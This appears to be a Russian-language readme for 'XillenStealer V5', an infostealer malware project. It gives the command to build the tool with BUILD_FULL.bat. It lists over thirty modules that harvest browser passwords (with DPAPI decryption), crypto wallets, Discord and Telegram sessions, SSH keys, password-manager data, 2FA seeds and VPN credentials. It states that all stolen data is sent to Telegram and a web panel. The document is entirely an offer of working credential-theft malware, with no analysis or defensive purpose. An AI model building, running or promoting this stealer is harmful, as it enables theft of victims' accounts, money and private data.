╔══════════════════════════════════════════════════════════╗
║    XILLENSTEALER V5 - ПОЛНАЯ ВЕРСИЯ ВСЕ МОДУЛИ          ║
╚══════════════════════════════════════════════════════════╝

✅ КОМАНДА ДЛЯ ЗАПУСКА:

    cd C:\Users\user\Desktop\XillenStealer-main\XillenStealer-V5-CPP
    
    .\BUILD_FULL.bat

═══════════════════════════════════════════════════════════

🎯 ЧТО СБИРАЕТСЯ:

    ✅ Browser Collector (Chrome, Edge, Opera, Brave, Firefox, 200+ браузеров)
    ✅ Browser Decryptor (расшифровка паролей DPAPI)
    ✅ Wallet Collector (Bitcoin, Ethereum, MetaMask, 80+ кошельков)
    ✅ App Collector (Discord, Telegram, FileZilla, WinSCP)
    ✅ Enterprise Collector (Citrix, VMware, Cisco VPN)
    ✅ Gaming Collector (Steam, Epic, Origin)
    ✅ Screenshot Collector (скриншот экрана)
    ✅ WiFi Collector (WiFi пароли)
    ✅ Config Collector (PuTTY, WinSCP, FileZilla)
    ✅ SSH Collector (SSH ключи)
    ✅ Database Collector (MySQL, PostgreSQL)
    ✅ Password Manager Collector (LastPass, 1Password, Dashlane)
    ✅ Social Media Collector (Facebook, Instagram токены)
    ✅ Clipboard Collector (буфер обмена)
    ✅ Cloud Collector (Dropbox, Google Drive, OneDrive)
    ✅ TOTP Collector (2FA seed)
    ✅ System Collector (процессы, софт, сеть)
    ✅ Token Collector (API токены)
    ✅ Backup Collector (резервные копии)
    ✅ Discord Token Collector
    ✅ Biometric Collector (биометрия Windows)
    ✅ WebRTC Collector (WebRTC leak)
    ✅ System Uptime Collector (время работы)
    ✅ Telegram Collector (Telegram сессии)
    ✅ VPN Collector (VPN клиенты)
    ✅ Emulator Collector (Android эмуляторы)
    ✅ Clipboard History Collector
    ✅ TPM Collector (Trusted Platform Module)
    ✅ Encryption Keys Collector (ключи шифрования)
    ✅ Registry Collector (реестр Windows)
    ✅ Payment Collector (платежи)
    ✅ GPU Collector (инфо о видеокарте)
    ✅ Fingerprint Collector (отпечаток системы)

═══════════════════════════════════════════════════════════

📤 ЧТО ОТПРАВЛЯЕТСЯ:

    ✅ ВСЁ в Telegram
    ✅ В веб-панель
    ✅ С шифрованием
    ✅ С информацией о стране

═══════════════════════════════════════════════════════════

🚀 ЗАПУСТИ: .\BUILD_FULL.bat
